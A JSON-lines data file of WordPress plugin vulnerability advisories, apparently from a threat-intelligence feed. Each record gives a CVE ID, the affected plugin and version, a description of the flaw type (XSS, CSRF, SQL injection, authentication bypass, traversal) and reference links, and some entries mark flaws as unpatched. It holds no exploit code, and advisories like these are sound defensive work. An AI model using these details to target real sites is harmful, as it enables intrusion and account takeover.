{"CVE_ID":"CVE-2025-6201","slug":"woocommerce-google-adwords-conversion-tracking-tag","versionImpact":"1.49.0","description":"The Pixel Manager for WooCommerce \u2013 Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's conversion-pixel in all versions up to, and including, 1.49.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php#L289\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php#L289\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313714\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313714\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/170a4cf2-d379-4c4e-b9e5-fb3b3bd91a40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/170a4cf2-d379-4c4e-b9e5-fb3b3bd91a40?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6831","slug":"user-registration","versionImpact":"4.2.4","description":"The User Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's urcr_restrict shortcode in all versions up to, and including, 4.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329704\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329704\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-registration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-registration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f3e469-f788-45da-95e7-aa6da1e87fd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f3e469-f788-45da-95e7-aa6da1e87fd1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1333","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_page_cache function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cba74f7-7183-4297-8f04-4818c01358ef\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cba74f7-7183-4297-8f04-4818c01358ef\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0280","slug":"ultimate-carousel-for-elementor","versionImpact":"2.1.7","description":"The Ultimate Carousel For Elementor WordPress plugin through 2.1.7 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb7ed9e6-0fa0-4ebb-9109-8f33defc8b32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb7ed9e6-0fa0-4ebb-9109-8f33defc8b32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2895","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_activate_product function. This makes it possible for unauthenticated attackers to bulk activate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02fd8469-cd99-42dc-9a28-c0ea08512bb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02fd8469-cd99-42dc-9a28-c0ea08512bb0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25706","slug":"better-robots-txt","description":"Cross-Site Request Forgery (CSRF) vulnerability in Pagup WordPress Robots.Txt optimization plugin <=\u00a01.4.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-robots-txt\\\/wordpress-wordpress-robots-txt-optimization-xml-sitemap-website-traffic-seo-ranking-booster-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-robots-txt\\\/wordpress-wordpress-robots-txt-optimization-xml-sitemap-website-traffic-seo-ranking-booster-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4915","slug":"wp-user-control","description":"The WP User Control plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including, 1.5.3. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (in the WP User Control Widget). The function changes the user's password after providing the email. The new password is only sent to the user's email, so the attacker does not have access to the new password.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4ca1736-7b99-49db-9367-586dbc14df41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4ca1736-7b99-49db-9367-586dbc14df41?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-control\\\/tags\\\/1.5.3\\\/inc\\\/WPUserControlWidget.php#L893\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-control\\\/tags\\\/1.5.3\\\/inc\\\/WPUserControlWidget.php#L893\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49170","slug":"captainform","versionImpact":"2.5.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm \u2013 Form Builder for WordPress allows Reflected XSS. This issue affects Forms by CaptainForm \u2013 Form Builder for WordPress: from n\/a through 2.5.3.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-form-builder-for-wordpress-plugin-2-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-form-builder-for-wordpress-plugin-2-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1710","slug":"addon-library","versionImpact":"1.3.76","description":"The Addon Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the onAjaxAction function action in all versions up to, and including, 1.3.76. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions including uploading arbitrary files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-library\\\/trunk\\\/inc_php\\\/unitecreator_actions.class.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-library\\\/trunk\\\/inc_php\\\/unitecreator_actions.class.php#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8681","slug":"premium-addons-for-elementor","versionImpact":"4.10.52","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Media Grid widget in all versions up to, and including, 4.10.52 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de207181-0163-4222-ac16-d7b74179ff9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de207181-0163-4222-ac16-d7b74179ff9b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/compatibility\\\/widgets\\\/grid.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/compatibility\\\/widgets\\\/grid.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3033\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3033\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-addons.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-addons.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3149\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12463","slug":"arena-liveblog-and-chat-tool","versionImpact":"0.4.1","description":"The Arena.IM \u2013 Live Blogging for real-time events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'arena_embed_amp' shortcode in all versions up to, and including, 0.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/729492e8-5625-444f-84ed-36b72cebc722?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/729492e8-5625-444f-84ed-36b72cebc722?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12222","slug":"wc-shipos-delivery","versionImpact":"2.1.7","description":"The Deliver via Shipos for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018dvsfw_bulk_label_url\u2019 parameter in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-shipos-delivery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-shipos-delivery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/377afb95-02d9-46b9-936d-3d58257dd928?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/377afb95-02d9-46b9-936d-3d58257dd928?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13561","slug":"brid-video-easy-publish","versionImpact":"3.8.3","description":"The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's brid_override_yt shortcode in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L412\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc67fbfa-d84c-45c3-bbb1-4557dc70a8c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc67fbfa-d84c-45c3-bbb1-4557dc70a8c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11286","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the cs_parse_request() function. This makes it possible for unauthenticated attackers to log in to any user's account, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5240","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.7.5","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018type\u2019 parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256449\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256449\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crm-customer-relationship-management-by-vcita\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crm-customer-relationship-management-by-vcita\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3643c741-559b-438b-9a39-518b9a6dfbf4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3643c741-559b-438b-9a39-518b9a6dfbf4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1374","slug":"solidres","versionImpact":"0.9.4","description":"The Solidres plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'currency_name' parameter in versions up to, and including, 0.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrator privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b13ee51b-9f23-428f-9cef-4a9b9b06b0c4\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b13ee51b-9f23-428f-9cef-4a9b9b06b0c4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/solidres\\\/trunk\\\/admin\\\/currencies\\\/edit.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/solidres\\\/trunk\\\/admin\\\/currencies\\\/edit.php#L15\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/danielkelley.me\\\/solidres-hotel-booking-plugin-for-wordpress-post-based-xss-vulnerability-in-add-new-currency-feature\\\/\",\"name\":\"https:\\\/\\\/danielkelley.me\\\/solidres-hotel-booking-plugin-for-wordpress-post-based-xss-vulnerability-in-add-new-currency-feature\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2894","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_deactivate_product function. This makes it possible for unauthenticated attackers to bulk deactivate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a68b8df9-9b50-4617-9308-76a2a9036d7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a68b8df9-9b50-4617-9308-76a2a9036d7a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34185","slug":"wordpress-nextgen-galleryview","versionImpact":"0.5.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in John Brien WordPress NextGen GalleryView plugin <=\u00a00.5.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4213","slug":"simplr-registration-form","versionImpact":"2.4.5","description":"The Simplr Registration Form Plus+ plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.4.5. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber-level permissions or above to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ddf0452-3afe-4ada-bccc-30c818968a81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ddf0452-3afe-4ada-bccc-30c818968a81?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplr-registration-form\\\/trunk\\\/lib\\\/profile.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplr-registration-form\\\/trunk\\\/lib\\\/profile.php#L148\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1165","slug":"brizy","versionImpact":"2.4.39","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.39 via the 'id'. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files to arbitrary locations on the server","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.39\\\/editor\\\/screenshot\\\/manager.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.39\\\/editor\\\/screenshot\\\/manager.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/screenshot\\\/manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/screenshot\\\/manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4997","slug":"wpupper-share-buttons","versionImpact":"3.43","description":"The WPUpper Share Buttons plugin for WordPress is vulnerable to unauthorized access of data when preparing sharing links for posts and pages in all versions up to, and including, 3.43. This makes it possible for unauthenticated attackers to obtain the contents of password protected posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c68ec00c-20a5-461d-bf72-c3190d29c9cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c68ec00c-20a5-461d-bf72-c3190d29c9cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpupper-share-buttons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpupper-share-buttons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9130","slug":"give","versionImpact":"3.16.1","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter in all versions up to, and including, 3.16.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with GiveWP Manager-level access and above, to append additional SQL queries into already existing queries within the Legacy View mode, that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3cae01-620d-405e-baf6-2d66a5b429b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3cae01-620d-405e-baf6-2d66a5b429b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/donors\\\/class-give-donors-query.php#L453\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/donors\\\/class-give-donors-query.php#L453\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/givewp.com\\\/documentation\\\/core\\\/give-user-roles\\\/\",\"name\":\"https:\\\/\\\/givewp.com\\\/documentation\\\/core\\\/give-user-roles\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/trunk\\\/includes\\\/donors\\\/class-give-donors-query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/trunk\\\/includes\\\/donors\\\/cla